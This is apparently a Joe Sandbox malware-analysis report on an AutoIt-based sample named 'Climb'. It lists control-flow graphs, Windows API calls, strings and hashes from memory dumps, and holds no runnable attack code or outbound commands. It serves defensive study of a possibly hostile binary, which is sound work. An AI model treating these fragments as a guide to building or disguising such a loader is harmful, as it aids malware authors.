                                                                                                                                                                          • Opcode ID: b6e85f4bf1b317af7eabd9ce2e22e3e98692739b5d450cbcd51a9c2e8557deeb
                                                                                                                                                                          • Instruction ID: 85b3ddb3d8f7896828c84d05ccd765ffe0371de5e10331ea40511f8e844f4f7d
                                                                                                                                                                          • Opcode Fuzzy Hash: b6e85f4bf1b317af7eabd9ce2e22e3e98692739b5d450cbcd51a9c2e8557deeb
                                                                                                                                                                          • Instruction Fuzzy Hash: 5291DE35604201AFD720DF25C888F5ABBE0FF48318F1885A9F5698B7A2C730ED81CB91

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 602 b370f-b3724 603 b3726-b3729 602->603 604 b3784-b3786 602->604 606 b372b-b3732 603->606 607 b378a 603->607 604->603 605 b3788 604->605 608 b376f-b3777 DefWindowProcW 605->608 611 b3738-b373d 606->611 612 b3804-b380c PostQuitMessage 606->612 609 f3df4-f3e1c call b2f92 call cf23c 607->609 610 b3790-b3795 607->610 613 b377d-b3783 608->613 648 f3e21-f3e28 609->648 615 b37bc-b37e3 SetTimer RegisterWindowMessageW 610->615 616 b3797-b379a 610->616 617 b3743-b3747 611->617 618 f3e61-f3e75 call 11c8f7 611->618 614 b37b8-b37ba 612->614 614->613 615->614 622 b37e5-b37f0 CreatePopupMenu 615->622 620 f3d95-f3d98 616->620 621 b37a0-b37b3 KillTimer call b3907 call b59ff 616->621 623 b380e-b3818 call cfcad 617->623 624 b374d-b3752 617->624 618->614 643 f3e7b 618->643 628 f3d9a-f3d9e 620->628 629 f3dd0-f3def MoveWindow 620->629 621->614 622->614 636 b381d 623->636 631 b3758-b375d 624->631 632 f3e46-f3e4d 624->632 637 f3dbf-f3dcb SetFocus 628->637 638 f3da0-f3da3 628->638 629->614 641 b3763-b3769 631->641 642 b37f2-b3802 call b381f 631->642 632->608 640 f3e53-f3e5c call 111423 632->640 636->614 637->614 638->641 644 f3da9-f3dba call b2f92 638->644 640->608 641->608 641->648 642->614 643->608 644->614 648->608 649 f3e2e-f3e41 call b3907 call b396b 648->649 649->608
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000B3709,?,?), ref: 000B3777
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,000B3709,?,?), ref: 000B37A3
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000B37C6
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000B3709,?,?), ref: 000B37D1
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 000B37E5
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 000B3806
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                          • Opcode ID: 2c24fd08f305c4b39c1052e892a50206e221bc6d02372324a09d20dc7e6fa1ae
                                                                                                                                                                          • Instruction ID: 838b281d5ced889d65a222eedb624fa303c1025404623b3396107909cdd19cb6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c24fd08f305c4b39c1052e892a50206e221bc6d02372324a09d20dc7e6fa1ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4125F4288244BBDB352B38DD5EBFD3AE5EB09304F200125F901965A1DF749B849761

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 658 e90c5-e90d5 659 e90ef-e90f1 658->659 660 e90d7-e90ea call df636 call df649 658->660 661 e9459-e9466 call df636 call df649 659->661 662 e90f7-e90fd 659->662 674 e9471 660->674 679 e946c call e2b5c 661->679 662->661 664 e9103-e912e 662->664 664->661 668 e9134-e913d 664->668 672 e913f-e9152 call df636 call df649 668->672 673 e9157-e9159 668->673 672->679 677 e915f-e9163 673->677 678 e9455-e9457 673->678 680 e9474-e9479 674->680 677->678 682 e9169-e916d 677->682 678->680 679->674 682->672 685 e916f-e9186 682->685 687 e9188-e918b 685->687 688 e91a3-e91ac 685->688 691 e918d-e9193 687->691 692 e9195-e919e 687->692 689 e91ae-e91c5 call df636 call df649 call e2b5c 688->689 690 e91ca-e91d4 688->690 723 e938c 689->723 695 e91db-e91dc call e3b93 690->695 696 e91d6-e91d8 690->696 691->689 691->692 693 e923f-e9259 692->693 698 e925f-e926f 693->698 699 e932d-e9336 call efc1b 693->699 704 e91e1-e91f9 call e2d38 * 2 695->704 696->695 698->699 703 e9275-e9277 698->703 710 e9338-e934a 699->710 711 e93a9 699->711 703->699 707 e927d-e92a3 703->707 727 e91fb-e9211 call df649 call df636 704->727 728 e9216-e923c call e97a4 704->728 707->699 712 e92a9-e92bc 707->712 710->711 717 e934c-e935b GetConsoleMode 710->717 715 e93ad-e93c5 ReadFile 711->715 712->699 718 e92be-e92c0 712->718 721 e93c7-e93cd 715->721 722 e9421-e942c GetLastError 715->722 717->711 724 e935d-e9361 717->724 718->699 719 e92c2-e92ed 718->719 719->699 726 e92ef-e9302 719->726 721->722 731 e93cf 721->731 729 e942e-e9440 call df649 call df636 722->729 730 e9445-e9448 722->730 725 e938f-e9399 call e2d38 723->725 724->715 732 e9363-e937d ReadConsoleW 724->732 725->680 726->699 734 e9304-e9306 726->734 727->723 728->693 729->723 741 e944e-e9450 730->741 742 e9385-e938b call df613 730->742 738 e93d2-e93e4 731->738 739 e939e-e93a7 732->739 740 e937f GetLastError 732->740 734->699 744 e9308-e9328 734->744 738->725 748 e93e6-e93ea 738->748 739->738 740->742 741->725 742->723 744->699 752 e93ec-e93fc call e8de1 748->752 753 e9403-e940e 748->753 765 e93ff-e9401 752->765 758 e941a-e941f call e8c21 753->758 759 e9410 call e8f31 753->759 763 e9415-e9418 758->763 759->763 763->765 765->725
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 110d77bff30daa7cf685a38d535eb09b1c1bc2dd1fc3ec2b022a497f87cf53de
                                                                                                                                                                          • Instruction ID: f8f157b76f6bc66fb3230d3d0d9793dca464a4c258d81c0a8914bbd533ec950a
                                                                                                                                                                          • Opcode Fuzzy Hash: 110d77bff30daa7cf685a38d535eb09b1c1bc2dd1fc3ec2b022a497f87cf53de
                                                                                                                                                                          • Instruction Fuzzy Hash: A4C1E3B1904389AFDF11DFAAD841BADBBF4AF09310F144099E555BB3E2C7309A42CB61

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 766 cac3e-cb063 call b8ec0 call cbc58 call be6a0 773 108584-108591 766->773 774 cb069-cb073 766->774 775 108593 773->775 776 108596-1085a5 773->776 777 cb079-cb07e 774->777 778 10896b-108979 774->778 775->776 779 1085a7 776->779 780 1085aa 776->780 783 1085b2-1085b4 777->783 784 cb084-cb090 call cb5b6 777->784 781 10897b 778->781 782 10897e 778->782 779->780 780->783 781->782 785 108985-10898e 782->785 789 1085bd 783->789 784->789 791 cb096-cb0a3 call bc98d 784->791 787 108990 785->787 788 108993 785->788 787->788 793 10899c-1089eb call be6a0 call cbbbe * 2 788->793 792 1085c7 789->792 797 cb0ab-cb0b4 791->797 798 1085cf-1085d2 792->798 826 1089f1-108a03 call cb5b6 793->826 827 cb1e0-cb1f5 793->827 800 cb0b8-cb0d6 call d4d98 797->800 801 cb158-cb16f 798->801 802 1085d8-108600 call d4cd3 call b7ad5 798->802 820 cb0d8-cb0e1 800->820 821 cb0e5 800->821 804 108954-108957 801->804 805 cb175 801->805 836 108602-108606 802->836 837 10862d-108651 call b7b1a call bbd98 802->837 809 108a41-108a79 call be6a0 call cbbbe 804->809 810 10895d-108960 804->810 811 cb17b-cb17e 805->811 812 1088ff-108920 call be6a0 805->812 809->827 871 108a7f-108a91 call cb5b6 809->871 810->793 817 108962-108965 810->817 818 cb184-cb187 811->818 819 108729-108743 call cbbbe 811->819 812->827 841 108926-108938 call cb5b6 812->841 817->778 817->827 828 cb18d-cb190 818->828 829 1086ca-1086e0 call b6c03 818->829 858 108749-10874c 819->858 859 10888f-1088b5 call be6a0 819->859 820->800 830 cb0e3 820->830 821->792 832 cb0eb-cb0fc 821->832 862 108a05-108a0d 826->862 863 108a2f-108a3c call bc98d 826->863 843 cb1fb-cb20b call be6a0 827->843 844 108ac9-108acf 827->844 839 108656-108659 828->839 840 cb196-cb1b8 call be6a0 828->840 829->827 860 1086e6-1086fc call cb5b6 829->860 830->832 832->778 842 cb102-cb11c 832->842 836->837 849 108608-10862b call bad40 836->849 837->839 839->778 855 10865f-108674 call b6c03 839->855 840->827 879 cb1ba-cb1cc call cb5b6 840->879 882 108945 841->882 883 10893a-108943 call bc98d 841->883 842->798 854 cb122-cb154 call cbbbe call be6a0 842->854 844->797 847 108ad5 844->847 847->778 849->836 849->837 854->801 855->827 901 10867a-108690 call cb5b6 855->901 869 10874e-108751 858->869 870 1087bf-1087de call be6a0 858->870 859->827 904 1088bb-1088cd call cb5b6 859->904 907 10870d-108716 call b8ec0 860->907 908 1086fe-10870b call b8ec0 860->908 877 108a1e-108a29 call bb4b1 862->877 878 108a0f-108a13 862->878 914 108ac2-108ac4 863->914 885 108757-108774 call be6a0 869->885 886 108ada-108ae8 869->886 870->827 906 1087e4-1087f6 call cb5b6 870->906 918 108a93-108a9b 871->918 919 108ab5-108abe call bc98d 871->919 877->863 925 108b0b-108b19 877->925 878->877 894 108a15-108a19 878->894 926 1086ba-1086c3 call bc98d 879->926 927 cb1d2-cb1de 879->927 900 108949-10894f 882->900 883->900 885->827 929 10877a-10878c call cb5b6 885->929 892 108aea 886->892 893 108aed-108afd 886->893 892->893 909 108b02-108b06 893->909 910 108aff 893->910 911 108aa1-108aa3 894->911 900->827 939 108692-10869b call bc98d 901->939 940 10869d-1086ab call b8ec0 901->940 944 1088de 904->944 945 1088cf-1088dc call bc98d 904->945 906->827 947 1087fc-108805 call cb5b6 906->947 948 108719-108724 call b8577 907->948 908->948 909->843 910->909 911->827 914->827 930 108aa8-108ab3 call bb4b1 918->930 931 108a9d 918->931 919->914 936 108b1b 925->936 937 108b1e-108b21 925->937 926->829 927->827 960 10878e-10879d call bc98d 929->960 961 10879f 929->961 930->919 930->925 931->911 936->937 937->785 969 1086ae-1086b5 939->969 940->969 955 1088e2-1088e9 944->955 945->955 974 108807-108816 call bc98d 947->974 975 108818 947->975 948->827 963 1088f5 call b3907 955->963 964 1088eb-1088f0 call b396b 955->964 971 1087a3-1087ae call d9334 960->971 961->971 973 1088fa 963->973 964->827 969->827 971->778 984 1087b4-1087ba 971->984 973->827 979 10881c-10883f 974->979 975->979 982 108841-108848 979->982 983 10884d-108850 979->983 982->983 985 108860-108863 983->985 986 108852-10885b 983->986 984->827 987 108873-108876 985->987 988 108865-10886e 985->988 986->985 987->827 989 10887c-10888a 987->989 988->987 989->827
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                          • API String ID: 0-4285391669
                                                                                                                                                                          • Opcode ID: c1a7325117478ca48cc780965aab4e19cfbb0a22e3dcbf9538233a9dfdc281e8
                                                                                                                                                                          • Instruction ID: 92a7679716f34351f3a00b1bfa1d82bdaaa2ec2cd96e98242cfa53fb3992042e
                                                                                                                                                                          • Opcode Fuzzy Hash: c1a7325117478ca48cc780965aab4e19cfbb0a22e3dcbf9538233a9dfdc281e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 11622970608341CFC724DF14C195AAABBE1BF89308F14895EE8D99B3A2DB71D945CF92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1026 b35b3-b3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000B35E1
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000B3602
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B3616
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B361F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                          • Opcode ID: ee860913b9ce120ed7b0a86a548ee8a5531c911ceee8f58cad55a1401e1d7761
                                                                                                                                                                          • Instruction ID: bb7f13ffff5003c81e42ffb00aecdf1b0f5d33aaab6cda9ed668f89806ec6aa2
                                                                                                                                                                          • Opcode Fuzzy Hash: ee860913b9ce120ed7b0a86a548ee8a5531c911ceee8f58cad55a1401e1d7761
                                                                                                                                                                          • Instruction Fuzzy Hash: D1F0B7756402947AEB2257176C18E373EBDE7CAF54B10001AFD04A7570D6B91991DBB0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1027 b61a9-b61c0 1028 b62a8-b62ad 1027->1028 1029 b61c6-b61db call b7ad5 1027->1029 1032 f5278-f5287 LoadStringW 1029->1032 1033 b61e1-b61fd call b8577 1029->1033 1036 f5292-f529b 1032->1036 1039 f52ae-f52bc call b5cf9 1033->1039 1040 b6203-b6207 1033->1040 1037 b6229-b62a3 call d26b0 call b62ae call d4cf3 Shell_NotifyIconW call bbd98 1036->1037 1038 f52a1-f52a9 call bbed9 1036->1038 1037->1028 1038->1037 1039->1037 1050 f52c2-f52cd call 11a392 1039->1050 1040->1036 1041 b620d-b6224 call b6b7c call b7bb5 1040->1041 1041->1037 1057 f52cf-f52f5 call bbf73 call 11a350 call b7bb5 call bbd98 1050->1057 1058 f52fa-f5331 call 11a31c call cfe6f call b6b7c call b5cf9 call b6b7c 1050->1058 1057->1058 1058->1037
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F5287
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000B6299
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                          • Opcode ID: e399a20f8c8663bb1ad5a26cfab3414176c6f6d853084898ce87321b143a953d
                                                                                                                                                                          • Instruction ID: 51b0bf0355bff219d2118e006168e46208a99b969b43d4e85c5a75b5052ec0fd
                                                                                                                                                                          • Opcode Fuzzy Hash: e399a20f8c8663bb1ad5a26cfab3414176c6f6d853084898ce87321b143a953d
                                                                                                                                                                          • Instruction Fuzzy Hash: F241C9714083046BD711EB60DC55FEF77ECAF99310F00462EF999821A2EF759689C792

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1078 b58cb-b58d6 1079 b5948-b594a 1078->1079 1080 b58d8-b58dd 1078->1080 1081 b593b-b593e 1079->1081 1080->1079 1082 b58df-b58f7 RegOpenKeyExW 1080->1082 1082->1079 1083 b58f9-b5918 RegQueryValueExW 1082->1083 1084 b591a-b5925 1083->1084 1085 b592f-b593a RegCloseKey 1083->1085 1086 b593f-b5946 1084->1086 1087 b5927-b5929 1084->1087 1085->1081 1088 b592d 1086->1088 1087->1088 1088->1085
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B58EF
                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B5910
                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B5932
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                          • Opcode ID: 1dc4da322387f5f69d1a6ff44ac337855e4c41d9988131a4eb18dbe37d7f6691
                                                                                                                                                                          • Instruction ID: 2cf2d16aa1a14838be0db110ebf64fcebf9da609d44ea58bf676d535cb95a29b
                                                                                                                                                                          • Opcode Fuzzy Hash: 1dc4da322387f5f69d1a6ff44ac337855e4c41d9988131a4eb18dbe37d7f6691
                                                                                                                                                                          • Instruction Fuzzy Hash: 891179B5610618FFDF218F64DC84EEEBBB8EF01761F1084A9F801E7220E2319E419B64
                                                                                                                                                                          Strings
                                                                                                                                                                          • Variable must be of type 'Object'., xrefs: 001048C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                                                                                                          • API String ID: 0-109567571
                                                                                                                                                                          • Opcode ID: 8d564d9cd64b10eec7f7f2b0dba8d8c1647f66ee113f36631ce838f51018562a
                                                                                                                                                                          • Instruction ID: e0c1196427b1a8d49d61e40a5288a2305a4ad56ef7e66b0d5ee4ad71502e23ad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d564d9cd64b10eec7f7f2b0dba8d8c1647f66ee113f36631ce838f51018562a
                                                                                                                                                                          • Instruction Fuzzy Hash: 15C258B5A00216DFCB24CF98C880BBDB7F1BF18710F24816AE955AB392D775AD41CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000C15F2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                          • Opcode ID: 744389f565bbe87200b85b40d65efaa0998c2034069a0232ff0077837e2abafc
                                                                                                                                                                          • Instruction ID: 781f68576819d3e83ca73bea4cf67e4b080a98f66d1f66745fce6773181908bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 744389f565bbe87200b85b40d65efaa0998c2034069a0232ff0077837e2abafc
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB26974A08341CFDB64CF18C480B6EB7E1BB99704F24495DE9998B392D771EE81CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 000D09D8
                                                                                                                                                                            • Part of subcall function 000D3614: RaiseException.KERNEL32(?,?,?,000D09FA,?,00000000,?,?,?,?,?,?,000D09FA,00000000,00179758,00000000), ref: 000D3674
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 000D09F5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                          • Opcode ID: 669ea6fdb002ec1dc45de603e5e5087ff63ce4f893f93b702f30a6640f8aa9ab
                                                                                                                                                                          • Instruction ID: 3abef7b4a46272f26f43548413a44202f1c80e74053309388cfe96a8d9e87de7
                                                                                                                                                                          • Opcode Fuzzy Hash: 669ea6fdb002ec1dc45de603e5e5087ff63ce4f893f93b702f30a6640f8aa9ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0A43490030DB6CB14BAA8DC56ADEB7BC5B00350F608123B91C96797EB70E659C5B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00138D52
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00138D59
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00138F3A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
